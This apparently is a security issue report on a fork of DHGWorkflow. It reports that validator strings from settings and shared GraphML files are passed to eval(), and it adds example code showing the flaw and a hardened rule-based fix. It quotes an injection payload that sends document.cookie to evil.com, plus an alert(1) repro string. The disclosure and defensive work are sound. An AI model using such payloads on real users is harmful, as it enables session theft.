forked from KathiraveluLab/DHGWorkflow
`setEdgeNodeValidator` in `3-component.js` just straight up `eval()`s whatever string is in the node/edge validator fields. Those strings come from the Settings modal (user-typed JS), and they're also baked into saved GraphML files.
So if someone shares a graph with a validator like `}); fetch('https://evil.com?c='+document.cookie); ((x=>{`, congrats, you just got owned by opening a file.
The eslint-disable comments on those lines tell me someone knew this was bad and shipped it anyway:
```js
// in setEdgeNodeValidator, 3-component.js
this.nodeValidator = eval(nodeValidator);
this.edgeValidator = eval(edgeValidator);
```
Repro: Settings -> paste `}); alert(1); ((x=>{` into a validator field -> save -> reload. Runs on load.
Fix could be: use `new Function()` or sandbox it. `eval` on untrusted input is a problem.
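The following is an added example, not DHGWorkflow's code and not from the issue author. It assumes the validator field holds a complete JS function expression (something like `x => x.label !== ''`) that `eval()` turns into a callable, as the issue describes. It shows that a validator string from a shared file runs the moment it is loaded, that `new Function()` only changes scope and is not a sandbox, and one hardened alternative where validators are data interpreted by trusted code. Function names, the rule vocabulary and the sample rules are all constructed for the demonstration.

```javascript
// Added example (not DHGWorkflow's code). Assumes a validator field holds a
// complete JS function expression that eval() turns into a callable.

// The pattern from the issue: trust whatever string was saved and eval() it.
function unsafeCompileValidator(source) {
  return eval(source); // eslint-disable-line no-eval
}

// Constructed payload. It is a valid expression, so it still yields a working
// validator, but the left side of the comma expression runs as soon as the
// file is loaded, before any node is validated. A real payload would fetch()
// document.cookie here; this one only sets a marker we can observe offline.
const CONSTRUCTED_MALICIOUS_VALIDATOR =
  "(globalThis.__payloadRanOnLoad = true, x => true)";

function demoPayloadRunsOnLoad() {
  delete globalThis.__payloadRanOnLoad;
  const validator = unsafeCompileValidator(CONSTRUCTED_MALICIOUS_VALIDATOR);
  return {
    ranAtLoad: globalThis.__payloadRanOnLoad === true, // side effect fired
    looksLegit: validator({ id: "n1" }) === true,       // and still validates
  };
}

// new Function() is not a sandbox: it only hides the enclosing local scope.
// The body still runs with the page's full privileges every time it is called.
function demoNewFunctionIsNotSandbox() {
  delete globalThis.__payloadRanAtCall;
  const validator = new Function("x", "globalThis.__payloadRanAtCall = true; return true;");
  validator({ id: "n1" });
  return globalThis.__payloadRanAtCall === true;
}

// Hardened replacement: validators are data, not code. Each rule names one of
// a fixed set of checks implemented here; anything else is rejected outright,
// so a shared GraphML file can only supply parameters, never source.
const RULE_CHECKS = {
  required: (elem, attrs) => attrs.every((a) => elem[a] !== undefined && elem[a] !== ""),
  oneOf:    (elem, [attr, values]) => values.includes(elem[attr]),
  maxLen:   (elem, [attr, n]) => String(elem[attr] ?? "").length <= n,
  isType:   (elem, [attr, type]) => typeof elem[attr] === type,
};

function compileRules(rules) {
  if (!Array.isArray(rules)) throw new TypeError("validator rules must be a JSON array");
  const checks = rules.map((rule) => {
    if (!Array.isArray(rule) || rule.length !== 2) {
      throw new TypeError(`malformed rule: ${JSON.stringify(rule)}`);
    }
    const [name, arg] = rule;
    // hasOwnProperty keeps "constructor" / "__proto__" from resolving to anything.
    const fn = Object.prototype.hasOwnProperty.call(RULE_CHECKS, name) ? RULE_CHECKS[name] : null;
    if (!fn) throw new Error(`unknown rule: ${String(name)}`); // reject, never eval
    return (elem) => fn(elem, arg);
  });
  return (elem) => checks.every((check) => check(elem));
}

// What the Settings modal and the saved file would store instead of JS source
// (constructed sample):
const CONSTRUCTED_RULES_JSON = JSON.stringify([
  ["required", ["id", "label"]],
  ["maxLen",   ["label", 64]],
  ["oneOf",    ["kind", ["task", "decision"]]],
]);

function demoRules() {
  const validator = compileRules(JSON.parse(CONSTRUCTED_RULES_JSON));
  return {
    good: validator({ id: "n1", label: "ingest", kind: "task" }),
    bad:  validator({ id: "n2", label: "",       kind: "task" }),
  };
}

// A rule set that tries to smuggle code in is refused before anything runs.
function rejectsCodeLikeRules() {
  try {
    compileRules(JSON.parse('[["eval", "alert(1)"]]'));
    return false;
  } catch (e) {
    return true;
  }
}
```

The point of the last part is that the fix is not a different way to compile the string but not compiling it at all: once the validator is a small rule language, a malicious file can at worst produce a validator that rejects everything, not one that runs in the viewer's origin.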